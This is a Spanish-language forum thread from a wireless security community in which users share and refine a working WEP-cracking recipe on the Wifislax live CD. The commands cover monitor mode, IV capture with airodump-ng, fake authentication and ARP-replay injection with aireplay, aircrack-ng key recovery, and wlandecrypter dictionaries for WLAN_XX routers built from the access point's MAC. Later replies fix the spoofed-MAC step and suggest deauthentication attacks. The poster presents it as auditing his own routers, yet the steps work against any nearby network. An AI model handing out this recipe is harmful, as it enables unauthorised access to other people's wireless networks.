Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
03-Diciembre 02:32:23 (Mircoles)
Inicio Ayuda Ingresar Registrarse


+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Live CD Wifislax (Moderadores: ChimoC, the_often, chinitiw)
| | |-+  Pasos para Verificar WEP Wifi - Por favor mirar/ajustar/completar.
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 Imprimir
Autor Tema: Pasos para Verificar WEP Wifi - Por favor mirar/ajustar/completar.  (Leído 1821 veces)
dcialdella
*
Desconectado Desconectado

Mensajes: 5


« en: 19-Marzo 23:15:09 (Lunes) »

VERIFICAR LA SEGURIDAD DE MIS ROUTERS....

****** UPDATE 23-2-2007 **************************
Hasta ahora lo hacia con Debian, compilando modulos y con motherfucker, pero es complicado todo el proceso de preparar el kernel y entorno. Usaba portatil con placa DWL650 (viejita), antena externa y funciona correctamente todo.
( http://dcialdella.blogspot.com/2006/10/c-r-c-k-wifi-wep-wpa-completo-y.html mi metodo anterior/actual)

He probado "verificar la seguridad wep" de mi router con mi metodo y funcionaba, pero para "mi conexion WLAN" quería probar un nuevo método, ademas de usar la placa BROADCOM de mi portatil, no usar mas DWL650 y de paso probar Wifislax.

Estoy ahora probando WifiSlax V2.0, me gustó mucho que venga armadita en un solo CD con muchas de las herramientas de seguridad.


DEJO EN MAYUSCULAS Y NEGRITAS LAS COSAS PENDIENTES


Estaba haciendo una secuencia para verificar la clave wep de WLAN_XX pero me encontre con varios problemas.

Esta es la secuencia completa que probé y que FUNCIONA....

* tengo una portatil Compaq con una placa broadcom 4318
y tambien con una PCMCIA dwl 650 (aunque wifislax la reconoce, no la uso)

* boot con WifiSlax V2.0

* Activar placas y poner en modo monitor/promiscuo
iwconfig eth1 mode monitor
ifconfig eth1 promisc
ifconfig eth1 up
(con esto defino modo monitor para eth1 y modo promiscuo y levanto la placa)

* configuro Kismet
vi /usr/local/etc/kismet.conf

Linea 23, agrego
source=hostap,eth1,prism2

en algunas placas se debe poner esto (madwifi)
source=wlanng,wlan0,Prism

* luego KISMET y ver redes, info, macs
luego "Q" para salir

* veo varias WLAN_XX, apunto "MI RED WLAN"
(veía 6 al mismo tiempo)

* airodump-ng eth1
(para ver ssids, macs y clientes asociados a cada ssid)
(me aparecen varias, mirar debajo y busco BSSID del AP y STATION)

* airodump-ng eth1 --channel 12 --bssid XX:XX:XX:XX:XX:XX
(XX:XX:XX:XX:XXX:XX = mac del AP, el canal puede ser otro)

* airodump-ng eth1 --channel 12 --ivs -w cap1 --bssid XX:XX:XX:XX:XX:XX
(con esto solo capturo paquetes IVs y los grabo en fichero CAP1-01)

* aireplay-broadcom-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY eth1
(poner ssid del AP, MAC del ap xx y MAC de un cliente conectado)

en general no se asocia, aunque alguna ves lo he logrado
17:27:53  Sending Authentication Request
17:27:53  Authentication successful
..... aparece algo como IS WPA IN USE ?
17:27:53  Sending Association Request
17:27:53  Association successful :-)
A VECES NO FUNCIONA

* proximo paso.
aireplay-broadcom-ng -3  -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY eth1
XXXXXXXXXXXX -> MAC real del AP.
YYYYYYYYYYYY -> MAC de un cliente
(mac obtenida antes)

En mi router CISCO funciona y empiezan a aparecer paquetes IV, pero a razón de 30 a 50 por segundo, lo que es poco.

si todo va bien, deberian aparecer miles de ARP REQUESTS
Saving ARP Requests in REPLAY_ARP-aaaa.cap
Read 892312 packets (got 12313 ARP requests), sent 1231233 packets
(el fichero REPLAY_ayxxxx.cap sera donde queden los paquetes de tipo IV ?)
Con 256.000 alcanzó para que el programa obtenga la clave. Quizas para WLAN hacen falta 2 o 10 ?

* aircrack-ng -a 1 cap1-01.ivs
con esto, se pone a probar los paquetes capturados e intenta obtener el KEY
ESTO FUNCIONA para mi router CISCO.
Al final dice algo como


PARA REDES WLAN

* para redes WLAN_XX
wlandecrypter xx:xx:xx:xx:xx:xx WLAN_XX > pass
(con wlandecrypter genera unas cuantas claves para LA MAC REAL del AP
y guardo en un fichero esa lista de passwords)
PONER LA MAC COMPLETA y el SSID correcto (WLAN_XX)

* aircrack-ng captura1-01.cap -w pass
(fichero de captura y luego el fichero de pass)
Esto usa el diccionario generado antes para comparar paquetes y obtener el KEY


http://photos1.blogger.com/blogger/5157/94/1600/DSCF0046.jpg


POR FAVOR VERIFICAR, AGREGAR, ARREGLAR....
GRACIAS A TODOS POR EL APORTE DE COMENTARIOS.


« Última modificación: 23-Marzo 12:33:03 (Viernes) por unbAs » En línea
uNbAs
Administrador
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 4570


WWW
« Respuesta #1 en: 20-Marzo 00:01:13 (Martes) »

a ver ... parece q todo esta bien ... aunq no tengo una broadcom y no se muy bien como va con el kismet .... te armas un buen lio para arrancarlo ...

El ataque 3 es efectivo tanto con cliente conectado como con autentificacion falsa

Y para las redes XX puedes usar el aricrack con diccionario ...

Espero q tan simple respuesta te sirva para tan largo mensaje ...  Grin
En línea

Cada cosa en su sitio y un sitio para cada cosa




[Urge venta] Asus EeePC  (Poco uso y con Garantia)

[Urge venta]Cascos Audio Motorola S9
uNbAs
Administrador
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 4570


WWW
« Respuesta #2 en: 20-Marzo 00:07:50 (Martes) »

aircrack-ng (archivo de captura) -w (diccionario)

donde diccionario hace referencia al archivo txt q se creo con el Wlan_Decrypter

Una cosa mas, el diccionario de las claves se crea con toda la mac ... no solo con media ...

Y si tienes problemas para pillar los arp puede ser problema de distacia, cobertura o proteccion del router ... hay algunos router q no son accesibles a ciertos ataques como los q planteas ... A SPAM(0) un chico del foro le pasaba o algo habia comentado sobre el tema ... 

« Última modificación: 20-Marzo 00:29:53 (Martes) por unbAs » En línea

Cada cosa en su sitio y un sitio para cada cosa




[Urge venta] Asus EeePC  (Poco uso y con Garantia)

[Urge venta]Cascos Audio Motorola S9
the_often
Moderador
******
Desconectado Desconectado

Mensajes: 698


« Respuesta #3 en: 20-Marzo 10:00:07 (Martes) »

Buenas.
Yo he probado hace poco con una broadcom y Ws 2.0. No he usado nunca el kismet de momento (asi que del kismet ni idea), la verdad uso siempre el airodump.

ifconfig eth1 promisc
ifconfig eth1 up

Yo estos pasos no los hago y no me son necesarios (a mi al menos). Supongo que igual hacen falta para el kismet ¿?

A mi el atake 1 + 3 si me ha funcionado muy bien con la broadcom. No asi el 0 + 3.

En cuanto a lo de coger ARPs, a veces tardan bastante, mas aun si no hay clientes y usamos el A1.

Para el A1 de vez en cuando y arrancalo de nuevo. Asegurate de tener señal aceptable, y dejalo un buen rato. Si en media hora no te ha cogido ninguno, paralo y vuelve a intentarlo. A mi hay veces que me ha funcionado tras varios intentos. La señal que tengas es importante, tambien la antena que uses y el rate que le pongas. Normalmete con rate 1M no suele haber pproblemas.

Si ves que te sigue sin funcionar, pruebalo con otras redes si puedes, para comprobar que tu tarjeta es capaz. Algunos routers como bien te dicen, tienen proteccion contra estos atakes. A mi eso tambien me ha pasado. Por ejemplo me ocurria con un Ap que al hacer el A1 siempre fallaba la asociacion despues de 2 minutos o asi. Lo volvia a lanzar y a los 2 minutos el Ap me expulsaba de nuevo....


Una cuestion que me gustaria saber si a ti tambien te pasa con la broadcom (yo la que tengo lleva chip 4306):

      - Si lanzas el airodump te aparece bien el power (señal) de las redes que encuentra? A mi la columna del power me falla. En TODAS aparece -1 (aunque sé que es un error). Pero lo demas (modo managed, monitor e inyeccion) me funciona bien. Salvo el atake 0, que tendre que seguir probando.

UN SALUDO.

P.D: Lo de que al escanear un canal te aparezcan redes de canales contiguos creo que es normal. A mi tambien me pasa y no solo con la broadcom. Creo que es cosa de la version del airodump. Con la que llevaba el Wifislax 1 creo que no pasaba. En cualquier caso no es mucho problema.  Y despues para capturar de una red en concreto la filtras por canal y bssid y listo.

Se me olvidaba:
Citar
* proximo paso.
aireplay-broadcom-ng -3  -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY eth1
(misma mac de AP y de cliente ?)

XXXXXXXXXXXX -> MAC real del AP.
YYYYYYYYYYYY -> MAC falsa con la que te asociaste.
« Última modificación: 20-Marzo 10:11:44 (Martes) por the_often » En línea

El cura en misa:  "...y dijo Jesús: 'Lázaro, levantate y anda'.  Y entonces Lázaro se levantó y andó..."

Y un feligrés le interrumpe:  "¡¡ <b>ANDUVO,</b>  ATONTAO !!"

El cura continua:  "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."   

Jejejeje!
dcialdella
*
Desconectado Desconectado

Mensajes: 5


« Respuesta #4 en: 20-Marzo 10:09:45 (Martes) »


* usar el kismet, lo hago para ver APs, macs y algo de info, en algunos casos hasta obtiene IPS por ARP. es informativo.

* que es A1 ?

* el metodo 1 + 3
es lo que he puesto arriba, verdad ?
primero +1 0
luego +3

* en casa veo 6 redes WLAN, suelo hacer pruebas desde las 19 a 24 casi todos los dias, pero me extrañana que siempre haya 0 ARPs, no me parece normal.
Esta noche volvere a probar, y tambien con la DWL, aver que pasa.

En línea
the_often
Moderador
******
Desconectado Desconectado

Mensajes: 698


« Respuesta #5 en: 20-Marzo 10:23:19 (Martes) »

El Atake 1 es el de asociarse con MAC falsa.

Se me habia pasado una cosa:
Citar
* aireplay-broadcom-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY eth1
(poner ssid del AP, mac del ap y mac de uno de los clientes conectados)

Esto no esta bien. Te asocias con MAC falsa luego aqui tienes que poner la MAC falsa que tu te hayas asignado, no la de un cliente conectado.

MODIFICO: Y tambien es mejor que le pongas que cada cierto tiempo (segundos) renueve la asociacion:
airodump-broadcom-ng -1 30 e WLAN_XX -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY eth1

Si hay clientes prueba a hacer una desautorizacion (Atake 0) y luego a capturar ARPs. Si hay clientes en teoria sera todo mucho mas facil y rapido de hacer.

Salu2

P.D: Podrias responderme a esto?
Citar
Una cuestion que me gustaria saber si a ti tambien te pasa con la broadcom: (yo la que tengo lleva chip 4306):

      - ¿¿Al lanzar el airodump te aparece bien el power (señal) de las redes que encuentra? A mi la columna del power me falla. En TODAS aparece -1 (aunque sé que es un error). Pero lo demas (modo managed, monitor e inyeccion) me funciona bien. Salvo el atake 0, que tendre que seguir probando.
« Última modificación: 20-Marzo 11:19:55 (Martes) por the_often » En línea

El cura en misa:  "...y dijo Jesús: 'Lázaro, levantate y anda'.  Y entonces Lázaro se levantó y andó..."

Y un feligrés le interrumpe:  "¡¡ <b>ANDUVO,</b>  ATONTAO !!"

El cura continua:  "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."   

Jejejeje!
jmvalles
****
Desconectado Desconectado

Mensajes: 270



« Respuesta #6 en: 20-Marzo 19:54:27 (Martes) »

A veces aparece -1 en PWR despues de escanear varias veces.
Si usais airoscript con la opcion 8 (Reset), la columna Power se vuelve a mostrar bien.
En el reset creo que solo se cierran los procesos airodump-ng i aireplay-ng. Los volveis a lanzar y listo
En línea
dcialdella
*
Desconectado Desconectado

Mensajes: 5


« Respuesta #7 en: 21-Marzo 18:29:17 (Mircoles) »


ahora mismo estoy en ello, y aparecen siempre con -1
pero no he reseteado la placa, porque seguramente se cortara la captura.
(no lo se....)

En línea
the_often
Moderador
******
Desconectado Desconectado

Mensajes: 698


« Respuesta #8 en: 22-Marzo 16:37:29 (Jueves) »

jmvalles Gracias por tu aportacion. El problema es que esa opcion es para Pcmcia, y mi broadcom es PCI y por tanto esa opcion no da resultado.

Alguna idea para matar manualmente airodump-ng y aireplay-broadcom-ng  y probar a ver si rula al lanzarlos de nuevo??

Gracias
En línea

El cura en misa:  "...y dijo Jesús: 'Lázaro, levantate y anda'.  Y entonces Lázaro se levantó y andó..."

Y un feligrés le interrumpe:  "¡¡ <b>ANDUVO,</b>  ATONTAO !!"

El cura continua:  "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."   

Jejejeje!
dcialdella
*
Desconectado Desconectado

Mensajes: 5


« Respuesta #9 en: 22-Marzo 16:39:01 (Jueves) »


lo mas facil

ps -A

killall xxxxxx (nombre de procesos)
En línea
jmvalles
****
Desconectado Desconectado

Mensajes: 270



« Respuesta #10 en: 22-Marzo 19:27:52 (Jueves) »

Citar
Alguna idea para matar manualmente airodump-ng y aireplay-broadcom-ng  y probar a ver si rula al lanzarlos de nuevo??

El código de airoscript hace lo siguiente:

Código:
killall -9 aireplay-ng airodump-ng > /dev/null &

Así matas los procesos que quieres, ponle el nombre del proceso que te interese.

Además reinicia la interfaz que estás utilizando:

Código:
ifconfig xx down
cardctl eject
cardctl insert
ifconfig xx up

cardctl se utiliza para las pcmcia, busca su homólogo para pci, si es que existe. (No tengo ni idea... Huh)
En línea
uNbAs
Administrador
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 4570


WWW
« Respuesta #11 en: 22-Marzo 21:53:17 (Jueves) »

Para parar los procesos de la consola  Grin

control + z

 Wink
En línea

Cada cosa en su sitio y un sitio para cada cosa




[Urge venta] Asus EeePC  (Poco uso y con Garantia)

[Urge venta]Cascos Audio Motorola S9
dcialdella
*
Desconectado Desconectado

Mensajes: 5


« Respuesta #12 en: 23-Marzo 11:26:48 (Viernes) »


He actualizado el POST ORIGINAL (arriba de todo)...
En línea
Páginas: 1 Imprimir 
« anterior próximo »
Ir a:  

Powered by SMF 1.1.7 | SMF © 2006, Simple Machines LLC
Consejos publicitarios

Cheap Gas - Loans - Mortgage - Loans